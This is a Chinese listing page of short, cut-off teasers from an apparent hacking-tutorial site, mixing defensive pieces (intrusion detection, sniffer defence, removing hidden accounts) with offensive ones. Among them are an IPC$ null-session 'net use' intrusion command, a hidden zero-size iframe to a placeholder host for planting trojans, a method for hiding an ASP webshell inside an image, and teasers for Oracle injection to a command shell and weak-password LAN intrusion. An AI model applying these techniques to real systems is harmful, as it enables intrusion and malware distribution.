2021-12-14
445端口入侵,在这之前我们首先要看的还是445端口为什么回成为入侵的端口呢?445端口就是IPC 服务的默认端口
2021-12-14
由于安全威胁持续不断,配备入侵检测系统(IDS)已成为如今数据中心环境下最重要的要求之一。然而,随着越来越多的服务器将网卡升级到10GB/40GB以太网技术,我们越来越难在大众化硬件上以线速实施计算密集型入侵检测。
2021-12-14
对于进程这个概念,许多电脑用户都没有给予太多关注。在很多人印象里,只知道结束进程可以杀死程序,至于哪些进程对应哪些程序,究竟什么样的进程该杀,什么样的进程不能杀这些问题很少考虑。这里通过几个实例为大家揭开进程的神秘面纱。 实例一:和进程的“表
2021-12-14
看了你昨天的留言,我才知道原来木马可以用这么多方式传播呀。那我想问你一件事,常在河边走,哪有不湿鞋,你经常黑别人,难道就没有被别人黑过吗?你是怎么防范其他黑客攻击的呢? 就像你说的那样,我也中过木马,也同样被黑过,我的经验告诉
2021-12-14
一般用户很难发现系统中隐藏账户的存在,那么该怎么办呢?其实我们可以通过以下几点来解决这个问题,接下来教你如何把隐藏账户彻底请出系统,感兴趣的朋友不要错过
2021-12-14
《黑客手册》样刊里面,oldjun提到一种新的万能登陆密码。比如网上有很多这样的登陆验证代码: 程序代码 <% username=trim(Request.Form("username")) password=trim(Request.Form("password")) sql="Select * FROM ad
2021-12-14
应用程序级的安全漏洞通常不会像类似SirCam的邮件病毒或者诸如Code Red这样的蠕虫病毒那么容易广为扩散,但它们也同样会造成很多问题,从窃取产品或信息到使整个Web站点完全瘫痪。确保网站web应用程序的安全不是一件简单的事,而不幸的是对应用程序的攻击是非常容易的
2021-12-14
net use\192.168.0.1ipc$Content$nbsp;"" /user:administrator 提到139端口,我想知道的人一定非常多,本来是不想用写这个教程的,但考虑要照顾到新人,所以还是简单的写一下。 首先,连接的命令是: net<空格>use<空格>\IP地
2021-12-14
Win2k的缺省安装很容易被攻击者取得帐号列表,即使安装了最新的Service ack也是如此。 方案一 1.打补丁 微软的作风就是三天一小补,五天一大补,漏洞太多,补一点就好一点,使用“开始-WindowsUpdate"然后把所有的补丁都装进去吧 2.删除
2021-12-14
1,挂马的N种方法 (1) HTML挂马法。 常规的HTML挂马方法一般是在网页中插入一条iframe语句,像<iframe src=http://www.xxx.com/horse.html width=0 height=0></iframe>。查看站点是否被挂,一般是查找一下关键词iframe。 (2) 再隐藏一点的就是js
2021-12-14
今天的内容是获得主机的信息。 我们要黑一台主机,首先要了解它的信息, 包括它的类型,用户列表,目录,端口,漏洞等等。 首先我们我们要找一台主机来练手,随便挑吧!www.dddd.com(乱说的)第一部,呵呵, 先在ie里看看吧,mmmm.....做的还行,挺精致的!主要是
2021-12-14
用Google浏览器浏览此篇文章,并点击下面的字符: EVIL:% 是不是很爽,^_^。
2021-12-14
本文从怎样发现Sniffer ,如何进行抵御Sniffer,到最后介绍防止Sniffer的工具Antisnff,内容很详细,感兴趣的朋友可以参考一下
2021-12-14
犀利的 oracle 注入技术 原文发表在黑客手册 linx 2008.1.12 介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。 以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION…..改成 /xxx.jsp?id=1 a
2021-12-14
AIDE(全称“高级入侵检测环境”)是一种基于主机的开源入侵检测系统。它通过扫描一台(未被篡改)的Linux服务器的文件系统来构建文件属性数据库。然后,它对照该数据库,检查服务器的文件属性,然后在服务器运行时,一旦索引文件出现任何更改,就发出警告。
2021-12-14
此文章主要向大家讲述的是Sniffer攻击含义以及对其工作原理的描述,sniffers(嗅探器)几乎与internet有一样发展历史了。Sniffer是一种常用的收集有用数据方法,这些数据可以是用户的帐号和密码,可以是一些商用机密数据等等。
2021-12-14
正向连接木马,所谓正向,就是在中马者在机器上开个端口,而我们去连接他噶端口。而我们要知道距噶IP,先可以连接他。123就是他机器上开的端口 由于到现在,宽带上网(动态IP)和路由器的普遍,这个软件就有很大的不足 动态IP:每次拨号,IP都会跟换。所以,就
2021-12-14
1.名称:如何制作图片ASP木马 建一个asp文件,内容为<!--#i nclude file="ating.jpg"--> 找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为了运行成功,还要搜索<%和%>,将其变为00,(不要替
2021-12-14
1,挂马的N种方法 (1) HTML挂马法。 常规的HTML挂马方法一般是在网页中插入一条iframe语句,像<iframe src=http://www.xxx.com/horse.html width=0 height=0></iframe>。查看站点是否被挂,一般是查找一下关键词iframe。 (2) 再隐藏一点的就是js
2021-12-14
首先申明: 1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网; 2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),并且开了139端口,但没开防火墙的机子。 入侵工具: 一般要用到三个:NTscan变态扫描器,Recton--D贺免杀
关注官方微信